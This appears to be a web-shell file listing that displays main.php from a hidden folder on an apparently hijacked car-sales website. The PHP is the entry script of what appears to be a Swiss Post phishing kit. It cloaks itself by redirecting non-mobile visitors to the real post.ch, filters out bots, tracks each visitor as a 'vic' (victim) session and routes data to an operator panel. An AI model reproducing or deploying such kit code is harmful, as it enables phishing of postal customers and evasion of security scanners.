Current Path : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/ |
Current File : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/main.php |
<?php require (__DIR__)."/md.php"; $detect = new Mobile_Detect; if(!$detect->isMobile()){ exit(header("location: https://post.ch")); } require (__DIR__).'/panel/classes/Jeehan.class.php'; require (__DIR__).'/bots/botMother.php'; $ajaxPath = "../panel/process/processor.php"; $j=new Jeehan(); if(isset($_SESSION['vic'])==""){ $j->createVic(); } if($j->isBlocked()){ exit; } ?>